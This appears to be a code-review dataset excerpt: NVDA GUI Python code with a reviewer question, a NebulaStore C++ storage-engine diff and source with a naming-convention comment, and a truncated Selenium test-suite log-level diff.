d.Show() mainFrame.postPopup() class ExitDialog(wx.Dialog): _instance = None def __new__(cls, parent): # Make this a singleton. inst = cls._instance() if cls._instance else None if not inst: return super(cls, cls).__new__(cls, parent) return inst def __init__(self, parent): inst = ExitDialog._instance() if ExitDialog._instance else None if inst: return # Use a weakref so the instance can die. ExitDialog._instance = weakref.ref(self) # Translators: The title of the dialog to exit NVDA super(ExitDialog, self).__init__(parent, title=_("Exit NVDA")) dialog = self mainSizer = wx.BoxSizer(wx.VERTICAL) contentSizerHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) if globalVars.appArgs.disableAddons: # Translators: A message in the exit Dialog shown when all add-ons are disabled. addonsDisabledText = _("All add-ons are now disabled. 
They will be re-enabled on the next restart unless you choose to disable them again.") contentSizerHelper.addItem(wx.StaticText(self, wx.ID_ANY, label=addonsDisabledText)) # Translators: The label for actions list in the Exit dialog. labelText=_("What would you like to &do?") self.actions = [ # Translators: An option in the combo box to choose exit action. _("Exit"), # Translators: An option in the combo box to choose exit action. _("Restart") ] # Windows Store version of NVDA does not support add-ons yet. if not config.isAppX: # Translators: An option in the combo box to choose exit action. self.actions.append(_("Restart with add-ons disabled")) # Translators: An option in the combo box to choose exit action. self.actions.append(_("Restart with debug logging enabled")) if updateCheck and updateCheck.isPendingUpdate(): # Translators: An option in the combo box to choose exit action. self.actions.append(_("Install pending update")) self.actionsList = contentSizerHelper.addLabeledControl(labelText, wx.Choice, choices=self.actions) self.actionsList.SetSelection(0) contentSizerHelper.addDialogDismissButtons(wx.OK | wx.CANCEL) self.Bind(wx.EVT_BUTTON, self.onOk, id=wx.ID_OK) self.Bind(wx.EVT_BUTTON, self.onCancel, id=wx.ID_CANCEL) mainSizer.Add(contentSizerHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) mainSizer.Fit(self) self.Sizer = mainSizer self.actionsList.SetFocus() self.CentreOnScreen() def onOk(self, evt): action=self.actionsList.GetSelection() # Because Windows Store version of NVDA does not support add-ons yet, add 1 if action is 2 or above if this is such a case. if action >= 2 and config.isAppX: action += 1 if action == 0: wx.GetApp().ExitMainLoop() elif action == 1: queueHandler.queueFunction(queueHandler.eventQueue,core.restart) elif action == 2: queueHandler.queueFunction(queueHandler.eventQueue,core.restart,disableAddons=True) elif action == 3: queueHandler.queueFunction(queueHandler.eventQueue,core.restart,debugLogging=True) elif action == 4: if updateCheck: destPath, version, apiVersion, backCompatTo = updateCheck.getPendingUpdate() from addonHandler import getIncompatibleAddons if any(getIncompatibleAddons(currentAPIVersion=apiVersion, backCompatToAPIVersion=backCompatTo)): confirmUpdateDialog = updateCheck.UpdateAskInstallDialog( parent=gui.mainFrame, destPath=destPath, version=version, apiVersion=apiVersion, backCompatTo=backCompatTo ) confirmUpdateDialog.ShowModal() else: updateCheck.executePendingUpdate() self.Destroy() def onCancel(self, evt): self.Destroy() class ExecAndPump(threading.Thread): """Executes the given function with given args and kwargs in a background thread while blocking and pumping in the current thread.""" def __init__(self,func,*args,**kwargs): self.func=func self.args=args self.kwargs=kwargs fname = repr(func) super().__init__( name=f"{self.__class__.__module__}.{self.__class__.__qualname__}({fname})" ) self.threadExc=None self.start() time.sleep(0.1) threadHandle=ctypes.c_int() threadHandle.value=ctypes.windll.kernel32.OpenThread(0x100000,False,self.ident) msg=ctypes.wintypes.MSG() while ctypes.windll.user32.MsgWaitForMultipleObjects(1,ctypes.byref(threadHandle),False,-1,255)==1: while ctypes.windll.user32.PeekMessageW(ctypes.byref(msg),None,0,0,1): ctypes.windll.user32.TranslateMessage(ctypes.byref(msg)) ctypes.windll.user32.DispatchMessageW(ctypes.byref(msg)) if self.threadExc: raise self.threadExc def run(self): try: self.func(*self.args,**self.kwargs) except Exception as e: self.threadExc=e log.debugWarning("task had 
errors",exc_info=True) class IndeterminateProgressDialog(wx.ProgressDialog): def __init__(self, parent, title, message): super(IndeterminateProgressDialog, self).__init__(title, message, parent=parent) self._speechCounter = -1 self.timer = wx.PyTimer(self.Pulse) self.timer.Start(1000) self.Raise() self.CentreOnScreen() def Pulse(self): super(IndeterminateProgressDialog, self).Pulse() # We want progress to be spoken on the first pulse and every 10 pulses thereafter. # Therefore, cycle from 0 to 9 inclusive. self._speechCounter = (self._speechCounter + 1) % 10 pbConf = config.conf["presentation"]["progressBarUpdates"] if pbConf["progressBarOutputMode"] == "off": return if not pbConf["reportBackgroundProgressBars"] and not self.IsActive(): return if pbConf["progressBarOutputMode"] in ("beep", "both"): tones.beep(440, 40) if pbConf["progressBarOutputMode"] in ("speak", "both") and self._speechCounter == 0: # Translators: Announced periodically to indicate progress for an indeterminate progress bar. speech.speakMessage(_("Please wait")) def IsActive(self): #4714: In wxPython 3, ProgressDialog.IsActive always seems to return False. return winUser.isDescendantWindow(winUser.getForegroundWindow(), self.Handle) def done(self): self.timer.Stop() pbConf = config.conf["presentation"]["progressBarUpdates"] if pbConf["progressBarOutputMode"] in ("beep", "both") and (pbConf["reportBackgroundProgressBars"] or self.IsActive()): tones.beep(1760, 40) self.Hide() self.Destroy() def shouldConfigProfileTriggersBeSuspended(): """Determine whether configuration profile triggers should be suspended in relation to NVDA's GUI. For NVDA configuration dialogs, the configuration should remain the same as it was before the GUI was popped up so the user can change settings in the correct profile. Top-level windows that require this behavior should have a C{shouldSuspendConfigProfileTriggers} attribute set to C{True}. Because these dialogs are often opened via the NVDA menu, this applies to the NVDA menu as well. """ if winUser.getGUIThreadInfo(ctypes.windll.kernel32.GetCurrentThreadId()).flags & 0x00000010: # The NVDA menu is active. return True for window in wx.GetTopLevelWindows(): if window.IsShown() and getattr(window, "shouldSuspendConfigProfileTriggers", False): return True return False class NonReEntrantTimer(wx.Timer): """ Before WXPython 4, wx.Timer was nonre-entrant, meaning that if code within its callback pumped messages (E.g. called wx.Yield) and this timer was ready to fire again, the timer would not fire until the first callback had completed. However, in WXPython 4, wx.Timer is now re-entrant. Code in NVDA is not written to handle re-entrant timers, so this class provides a Timer with the old behaviour. This should be used in place of wx.Timer and wx.PyTimer where the callback will directly or indirectly call wx.Yield or some how process the Windows window message queue. For example, NVDA's core pump or other timers that run in NVDA's main thread. Timers on braille display drivers for key detection don't need to use this as they only queue gestures rather than actually executing them. """ def __init__(self, run=None): if run is not None: self.run = run self._inNotify = False super(NonReEntrantTimer,self).__init__() def run(self): """Subclasses can override or specify in constructor. 
""" raise NotImplementedError def Notify(self): if self._inNotify: return self._inNotify = True try: self.run() finally: self._inNotify = False def _isDebug(): return config.conf["debugLog"]["gui"] class AskAllowUsageStatsDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """A dialog asking if the user wishes to allow NVDA usage stats to be collected by NV Access.""" helpId = "UsageStatsDialog" def __init__(self, parent): # Translators: The title of the dialog asking if usage data can be collected super().__init__(parent, title=_("NVDA Usage Data Collection")) mainSizer = wx.BoxSizer(wx.VERTICAL) sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) # Translators: A message asking the user if they want to allow usage stats gathering message=_("In order to improve NVDA in the future, NV Access wishes to collect usage data from running copies of NVDA.\n\n" "Data includes Operating System version, NVDA version, language, country of origin, plus certain NVDA configuration such as current synthesizer, braille display and braille table. " "No spoken or braille content will be ever sent to NV Access. Please refer to the User Guide for a current list of all data collected.\n\n" "Do you wish to allow NV Access to periodically collect this data in order to improve NVDA?") sText=sHelper.addItem(wx.StaticText(self, label=message)) # the wx.Window must be constructed before we can get the handle. import windowUtils self.scaleFactor = windowUtils.getWindowScalingFactor(self.GetHandle()) sText.Wrap(self.scaleFactor*600) # 600 was fairly arbitrarily chosen by a visual user to look acceptable on their machine. bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL)) # Translators: The label of a Yes button in a dialog yesButton = bHelper.addButton(self, wx.ID_YES, label=_("&Yes")) yesButton.Bind(wx.EVT_BUTTON, self.onYesButton) # Translators: The label of a No button in a dialog noButton = bHelper.addButton(self, wx.ID_NO, label=_("&No")) noButton.Bind(wx.EVT_BUTTON, self.onNoButton) # Translators: The label of a button to remind the user later about performing some action. remindMeButton = bHelper.addButton(self, wx.ID_CANCEL, label=_("Remind me &later")) remindMeButton.Bind(wx.EVT_BUTTON, self.onLaterButton) remindMeButton.SetFocus() mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) self.Sizer = mainSizer mainSizer.Fit(self) self.Center(wx.BOTH | wx.CENTER_ON_SCREEN) def onYesButton(self,evt): log.debug("Usage stats gathering has been allowed") config.conf['update']['askedAllowUsageStats']=True config.conf['update']['allowUsageStats']=True self.EndModal(wx.ID_YES) def onNoButton(self,evt): log.debug("Usage stats gathering has been disallowed") config.conf['update']['askedAllowUsageStats']=True config.conf['update']['allowUsageStats']=False self.EndModal(wx.ID_NO) def onLaterButton(self,evt): log.debug("Usage stats gathering question has been deferred") # evt.Skip() is called since wx.ID_CANCEL is used as the ID for the Ask Later button, # wx automatically ends the modal itself. evt.Skip()
1
31,917
What if `getWxLang` returns `None` for `wxLang`? A guard for that case is sketched after this record.
nvaccess-nvda
py
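
The NVDA review question above concerns the two lines added in that diff: if `core.getWxLang` cannot map the current NVDA language to a wx language and returns `None`, then `wxLang.LayoutDirection` would raise `AttributeError` inside `gui.initialize()`. Below is a minimal sketch of one possible guard, reusing the `core`, `languageHandler`, and `mainFrame` names exactly as they appear in the diff; it illustrates the reviewer's point and is not the project's actual fix.

# Sketch only: a None-guard for the layout-direction lines added in the diff above.
# core and languageHandler are NVDA-internal modules, and mainFrame is the frame
# created a few lines earlier in gui.initialize(); none of this runs outside NVDA.
wxLang = core.getWxLang(languageHandler.getLanguage())
if wxLang is not None:
    # Only set the layout direction when wx recognises the current NVDA language.
    mainFrame.SetLayoutDirection(wxLang.LayoutDirection)
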
@@ -546,9 +546,9 @@ ResultCode NebulaStore::ingest(GraphSpaceID spaceId) {
             auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst");
             for (auto file : files) {
                 LOG(INFO) << "Ingesting extra file: " << file;
-                auto code = engine->ingest(std::vector<std::string>({file}));
-                if (code != ResultCode::SUCCEEDED) {
-                    return code;
+                auto ret_code = engine->ingest(std::vector<std::string>({file}));
+                if (ResultCode::SUCCEEDED != ret_code) {
+                    return ret_code;
                 }
             }
         }
1
/* Copyright (c) 2018 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "base/Base.h" #include "kvstore/NebulaStore.h" #include <folly/Likely.h> #include <algorithm> #include <cstdint> #include "network/NetworkUtils.h" #include "fs/FileUtils.h" #include "kvstore/RocksEngine.h" #include "kvstore/SnapshotManagerImpl.h" DEFINE_string(engine_type, "rocksdb", "rocksdb, memory..."); DEFINE_int32(custom_filter_interval_secs, 24 * 3600, "interval to trigger custom compaction"); DEFINE_int32(num_workers, 4, "Number of worker threads"); DEFINE_bool(check_leader, true, "Check leader or not"); namespace nebula { namespace kvstore { NebulaStore::~NebulaStore() { LOG(INFO) << "Cut off the relationship with meta client"; options_.partMan_.reset(); LOG(INFO) << "Stop the raft service..."; raftService_->stop(); LOG(INFO) << "Waiting for the raft service stop..."; raftService_->waitUntilStop(); spaces_.clear(); bgWorkers_->stop(); bgWorkers_->wait(); LOG(INFO) << "~NebulaStore()"; } bool NebulaStore::init() { LOG(INFO) << "Start the raft service..."; bgWorkers_ = std::make_shared<thread::GenericThreadPool>(); bgWorkers_->start(FLAGS_num_workers, "nebula-bgworkers"); snapshot_.reset(new SnapshotManagerImpl(this)); raftService_ = raftex::RaftexService::createService(ioPool_, workers_, raftAddr_.second); if (!raftService_->start()) { LOG(ERROR) << "Start the raft service failed"; return false; } CHECK(!!options_.partMan_); LOG(INFO) << "Scan the local path, and init the spaces_"; { for (auto& path : options_.dataPaths_) { auto rootPath = folly::stringPrintf("%s/nebula", path.c_str()); auto dirs = fs::FileUtils::listAllDirsInDir(rootPath.c_str()); for (auto& dir : dirs) { LOG(INFO) << "Scan path \"" << path << "/" << dir << "\""; try { GraphSpaceID spaceId; try { spaceId = folly::to<GraphSpaceID>(dir); } catch (const std::exception& ex) { LOG(ERROR) << "Data path invalid: " << ex.what(); return false; } if (!options_.partMan_->spaceExist(storeSvcAddr_, spaceId).ok()) { // TODO We might want to have a second thought here. 
// Removing the data directly feels a little strong LOG(INFO) << "Space " << spaceId << " does not exist any more, remove the data!"; auto dataPath = folly::stringPrintf("%s/%s", rootPath.c_str(), dir.c_str()); CHECK(fs::FileUtils::remove(dataPath.c_str(), true)); continue; } KVEngine* enginePtr = nullptr; { folly::RWSpinLock::WriteHolder wh(&lock_); auto engine = newEngine(spaceId, path); auto spaceIt = this->spaces_.find(spaceId); if (spaceIt == this->spaces_.end()) { LOG(INFO) << "Load space " << spaceId << " from disk"; spaceIt = this->spaces_.emplace( spaceId, std::make_unique<SpacePartInfo>()).first; } spaceIt->second->engines_.emplace_back(std::move(engine)); enginePtr = spaceIt->second->engines_.back().get(); } // partIds is the partition in this host waiting to open std::vector<PartitionID> partIds; for (auto& partId : enginePtr->allParts()) { if (!options_.partMan_->partExist(storeSvcAddr_, spaceId, partId).ok()) { LOG(INFO) << "Part " << partId << " does not exist any more, remove it!"; enginePtr->removePart(partId); continue; } else { partIds.emplace_back(partId); } } if (partIds.empty()) { continue; } std::atomic<size_t> counter(partIds.size()); folly::Baton<true, std::atomic> baton; LOG(INFO) << "Need to open " << partIds.size() << " parts of space " << spaceId; for (auto& partId : partIds) { bgWorkers_->addTask([ spaceId, partId, enginePtr, &counter, &baton, this] () mutable { auto part = std::make_shared<Part>(spaceId, partId, raftAddr_, folly::stringPrintf("%s/wal/%d", enginePtr->getDataRoot(), partId), enginePtr, ioPool_, bgWorkers_, workers_, snapshot_); auto status = options_.partMan_->partMeta(spaceId, partId); if (!status.ok()) { LOG(WARNING) << status.status().toString(); return; } auto partMeta = status.value(); std::vector<HostAddr> peers; for (auto& h : partMeta.peers_) { if (h != storeSvcAddr_) { peers.emplace_back(getRaftAddr(h)); VLOG(1) << "Add peer " << peers.back(); } } raftService_->addPartition(part); part->start(std::move(peers), false); LOG(INFO) << "Load part " << spaceId << ", " << partId << " from disk"; { folly::RWSpinLock::WriteHolder holder(&lock_); auto iter = spaces_.find(spaceId); CHECK(iter != spaces_.end()); iter->second->parts_.emplace(partId, part); } counter.fetch_sub(1); if (counter.load() == 0) { baton.post(); } }); } baton.wait(); LOG(INFO) << "Load space " << spaceId << " complete"; } catch (std::exception& e) { LOG(FATAL) << "Invalid data directory \"" << dir << "\""; } } } } LOG(INFO) << "Init data from partManager for " << storeSvcAddr_; auto partsMap = options_.partMan_->parts(storeSvcAddr_); for (auto& entry : partsMap) { auto spaceId = entry.first; addSpace(spaceId); std::vector<PartitionID> partIds; for (auto it = entry.second.begin(); it != entry.second.end(); it++) { partIds.emplace_back(it->first); } std::sort(partIds.begin(), partIds.end()); for (auto& partId : partIds) { addPart(spaceId, partId, false); } } LOG(INFO) << "Register handler..."; options_.partMan_->registerHandler(this); return true; } std::unique_ptr<KVEngine> NebulaStore::newEngine(GraphSpaceID spaceId, const std::string& path) { if (FLAGS_engine_type == "rocksdb") { std::shared_ptr<KVCompactionFilterFactory> cfFactory = nullptr; if (options_.cffBuilder_ != nullptr) { cfFactory = options_.cffBuilder_->buildCfFactory(spaceId, FLAGS_custom_filter_interval_secs); } return std::make_unique<RocksEngine>(spaceId, path, options_.mergeOp_, cfFactory); } else { LOG(FATAL) << "Unknown engine type " << FLAGS_engine_type; return nullptr; } } ErrorOr<ResultCode, HostAddr> 
NebulaStore::partLeader(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return getStoreAddr(partIt->second->leader()); } void NebulaStore::addSpace(GraphSpaceID spaceId) { folly::RWSpinLock::WriteHolder wh(&lock_); if (this->spaces_.find(spaceId) != this->spaces_.end()) { LOG(INFO) << "Space " << spaceId << " has existed!"; return; } LOG(INFO) << "Create space " << spaceId; this->spaces_[spaceId] = std::make_unique<SpacePartInfo>(); for (auto& path : options_.dataPaths_) { this->spaces_[spaceId]->engines_.emplace_back(newEngine(spaceId, path)); } } void NebulaStore::addPart(GraphSpaceID spaceId, PartitionID partId, bool asLearner) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); CHECK(spaceIt != this->spaces_.end()) << "Space should exist!"; if (spaceIt->second->parts_.find(partId) != spaceIt->second->parts_.end()) { LOG(INFO) << "[" << spaceId << "," << partId << "] has existed!"; return; } int32_t minIndex = -1; int32_t index = 0; int32_t minPartsNum = 0x7FFFFFFF; auto& engines = spaceIt->second->engines_; for (auto& engine : engines) { if (engine->totalPartsNum() < minPartsNum) { minPartsNum = engine->totalPartsNum(); minIndex = index; } index++; } CHECK_GE(minIndex, 0) << "engines number:" << engines.size(); const auto& targetEngine = engines[minIndex]; // Write the information into related engine. targetEngine->addPart(partId); spaceIt->second->parts_.emplace( partId, newPart(spaceId, partId, targetEngine.get(), asLearner)); LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been added, asLearner " << asLearner; } std::shared_ptr<Part> NebulaStore::newPart(GraphSpaceID spaceId, PartitionID partId, KVEngine* engine, bool asLearner) { auto part = std::make_shared<Part>(spaceId, partId, raftAddr_, folly::stringPrintf("%s/wal/%d", engine->getDataRoot(), partId), engine, ioPool_, bgWorkers_, workers_, snapshot_); auto metaStatus = options_.partMan_->partMeta(spaceId, partId); if (!metaStatus.ok()) { return nullptr; } auto partMeta = metaStatus.value(); std::vector<HostAddr> peers; for (auto& h : partMeta.peers_) { if (h != storeSvcAddr_) { peers.emplace_back(getRaftAddr(h)); VLOG(1) << "Add peer " << peers.back(); } } raftService_->addPartition(part); part->start(std::move(peers), asLearner); return part; } void NebulaStore::removeSpace(GraphSpaceID spaceId) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); auto& engines = spaceIt->second->engines_; for (auto& engine : engines) { auto parts = engine->allParts(); for (auto& partId : parts) { engine->removePart(partId); } CHECK_EQ(0, engine->totalPartsNum()); } this->spaces_.erase(spaceIt); // TODO(dangleptr): Should we delete the data? 
LOG(INFO) << "Space " << spaceId << " has been removed!"; } void NebulaStore::removePart(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::WriteHolder wh(&lock_); auto spaceIt = this->spaces_.find(spaceId); if (spaceIt != this->spaces_.end()) { auto partIt = spaceIt->second->parts_.find(partId); if (partIt != spaceIt->second->parts_.end()) { auto* e = partIt->second->engine(); CHECK_NOTNULL(e); raftService_->removePartition(partIt->second); partIt->second->reset(); spaceIt->second->parts_.erase(partId); e->removePart(partId); } } LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been removed!"; } void NebulaStore::updateSpaceOption(GraphSpaceID spaceId, const std::unordered_map<std::string, std::string>& options, bool isDbOption) { if (isDbOption) { for (const auto& kv : options) { setDBOption(spaceId, kv.first, kv.second); } } else { for (const auto& kv : options) { setOption(spaceId, kv.first, kv.second); } } } ResultCode NebulaStore::get(GraphSpaceID spaceId, PartitionID partId, const std::string& key, std::string* value) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->get(key, value); } ResultCode NebulaStore::multiGet(GraphSpaceID spaceId, PartitionID partId, const std::vector<std::string>& keys, std::vector<std::string>* values) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->multiGet(keys, values); } ResultCode NebulaStore::range(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& end, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->range(start, end, iter); } ResultCode NebulaStore::prefix(GraphSpaceID spaceId, PartitionID partId, const std::string& prefix, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->prefix(prefix, iter); } ResultCode NebulaStore::rangeWithPrefix(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& prefix, std::unique_ptr<KVIterator>* iter) { auto ret = part(spaceId, partId); if (!ok(ret)) { return error(ret); } auto part = nebula::value(ret); if (!checkLeader(part)) { return ResultCode::ERR_LEADER_CHANGED; } return part->engine()->rangeWithPrefix(start, prefix, iter); } void NebulaStore::asyncMultiPut(GraphSpaceID spaceId, PartitionID partId, std::vector<KV> keyValues, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncMultiPut(std::move(keyValues), std::move(cb)); } void NebulaStore::asyncRemove(GraphSpaceID spaceId, PartitionID partId, const std::string& key, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemove(key, std::move(cb)); } void NebulaStore::asyncMultiRemove(GraphSpaceID spaceId, PartitionID partId, std::vector<std::string> keys, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = 
nebula::value(ret); part->asyncMultiRemove(std::move(keys), std::move(cb)); } void NebulaStore::asyncRemoveRange(GraphSpaceID spaceId, PartitionID partId, const std::string& start, const std::string& end, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemoveRange(start, end, std::move(cb)); } void NebulaStore::asyncRemovePrefix(GraphSpaceID spaceId, PartitionID partId, const std::string& prefix, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncRemovePrefix(prefix, std::move(cb)); } void NebulaStore::asyncAtomicOp(GraphSpaceID spaceId, PartitionID partId, raftex::AtomicOp op, KVCallback cb) { auto ret = part(spaceId, partId); if (!ok(ret)) { cb(error(ret)); return; } auto part = nebula::value(ret); part->asyncAtomicOp(std::move(op), std::move(cb)); } ErrorOr<ResultCode, std::shared_ptr<Part>> NebulaStore::part(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return partIt->second; } ResultCode NebulaStore::ingest(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto parts = engine->allParts(); for (auto part : parts) { auto ret = this->engine(spaceId, part); if (!ok(ret)) { return error(ret); } auto path = folly::stringPrintf("%s/download/%d", value(ret)->getDataRoot(), part); if (!fs::FileUtils::exist(path)) { LOG(INFO) << path << " not existed"; continue; } auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst"); for (auto file : files) { LOG(INFO) << "Ingesting extra file: " << file; auto code = engine->ingest(std::vector<std::string>({file})); if (code != ResultCode::SUCCEEDED) { return code; } } } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setOption(GraphSpaceID spaceId, const std::string& configKey, const std::string& configValue) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->setOption(configKey, configValue); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setDBOption(GraphSpaceID spaceId, const std::string& configKey, const std::string& configValue) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->setDBOption(configKey, configValue); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::compact(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); auto code = ResultCode::SUCCEEDED; std::vector<std::thread> threads; for (auto& engine : space->engines_) { threads.emplace_back(std::thread([&engine, &code] { auto ret = engine->compact(); if (ret != ResultCode::SUCCEEDED) { code = ret; } })); } // Wait for all threads to finish for (auto& t : threads) { t.join(); } return code; } ResultCode 
NebulaStore::flush(GraphSpaceID spaceId) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->flush(); if (code != ResultCode::SUCCEEDED) { return code; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::createCheckpoint(GraphSpaceID spaceId, const std::string& name) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto code = engine->createCheckpoint(name); if (code != ResultCode::SUCCEEDED) { return code; } // create wal hard link for all parts auto parts = engine->allParts(); for (auto& part : parts) { auto ret = this->part(spaceId, part); if (!ok(ret)) { LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part; return error(ret); } auto walPath = folly::stringPrintf("%s/checkpoints/%s/wal/%d", engine->getDataRoot(), name.c_str(), part); auto p = nebula::value(ret); if (!p->linkCurrentWAL(walPath.data())) { return ResultCode::ERR_CHECKPOINT_ERROR; } } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::dropCheckpoint(GraphSpaceID spaceId, const std::string& name) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { /** * Drop checkpoint and wal together **/ auto checkpointPath = folly::stringPrintf("%s/checkpoints/%s", engine->getDataRoot(), name.c_str()); LOG(INFO) << "Drop checkpoint : " << checkpointPath; if (!fs::FileUtils::exist(checkpointPath)) { continue; } if (!fs::FileUtils::remove(checkpointPath.data(), true)) { LOG(ERROR) << "Drop checkpoint dir failed : " << checkpointPath; return ResultCode::ERR_IO_ERROR; } } return ResultCode::SUCCEEDED; } ResultCode NebulaStore::setWriteBlocking(GraphSpaceID spaceId, bool sign) { auto spaceRet = space(spaceId); if (!ok(spaceRet)) { return error(spaceRet); } auto space = nebula::value(spaceRet); for (auto& engine : space->engines_) { auto parts = engine->allParts(); for (auto& part : parts) { auto partRet = this->part(spaceId, part); if (!ok(partRet)) { LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part; return error(partRet); } auto p = nebula::value(partRet); if (p->isLeader()) { auto ret = ResultCode::SUCCEEDED; p->setBlocking(sign); if (sign) { folly::Baton<true, std::atomic> baton; p->sync([&ret, &baton] (kvstore::ResultCode code) { if (kvstore::ResultCode::SUCCEEDED != code) { ret = code; } baton.post(); }); baton.wait(); } if (ret != ResultCode::SUCCEEDED) { LOG(ERROR) << "Part sync failed. 
space : " << spaceId << " Part : " << part; return ret; } } } } return ResultCode::SUCCEEDED; } bool NebulaStore::isLeader(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto spaceIt = spaces_.find(spaceId); if (spaceIt != this->spaces_.end()) { auto partIt = spaceIt->second->parts_.find(partId); if (partIt != spaceIt->second->parts_.end()) { return partIt->second->isLeader(); } else { return false; } } return false; } ErrorOr<ResultCode, KVEngine*> NebulaStore::engine(GraphSpaceID spaceId, PartitionID partId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } auto& parts = it->second->parts_; auto partIt = parts.find(partId); if (UNLIKELY(partIt == parts.end())) { return ResultCode::ERR_PART_NOT_FOUND; } return partIt->second->engine(); } ErrorOr<ResultCode, std::shared_ptr<SpacePartInfo>> NebulaStore::space(GraphSpaceID spaceId) { folly::RWSpinLock::ReadHolder rh(&lock_); auto it = spaces_.find(spaceId); if (UNLIKELY(it == spaces_.end())) { return ResultCode::ERR_SPACE_NOT_FOUND; } return it->second; } int32_t NebulaStore::allLeader(std::unordered_map<GraphSpaceID, std::vector<PartitionID>>& leaderIds) { folly::RWSpinLock::ReadHolder rh(&lock_); int32_t count = 0; for (const auto& spaceIt : spaces_) { auto spaceId = spaceIt.first; for (const auto& partIt : spaceIt.second->parts_) { auto partId = partIt.first; if (partIt.second->isLeader()) { leaderIds[spaceId].emplace_back(partId); ++count; } } } return count; } bool NebulaStore::checkLeader(std::shared_ptr<Part> part) const { return !FLAGS_check_leader || part->isLeader(); } } // namespace kvstore } // namespace nebula
1
27,579
Please don't make changes like this unless it _**really**_ matters. BTW, please look around to infer our naming conventions.
vesoft-inc-nebula
cpp
@@ -35,13 +35,13 @@ public class BaseSuite {
   public static ExternalResource testEnvironment = new ExternalResource() {
     @Override
     protected void before() {
-      log.info("Preparing test environment");
+      log.finest("Preparing test environment");
       GlobalTestEnvironment.get(SeleniumTestEnvironment.class);
       System.setProperty("webdriver.remote.shorten_log_messages", "true");
     }
     @Override
     protected void after() {
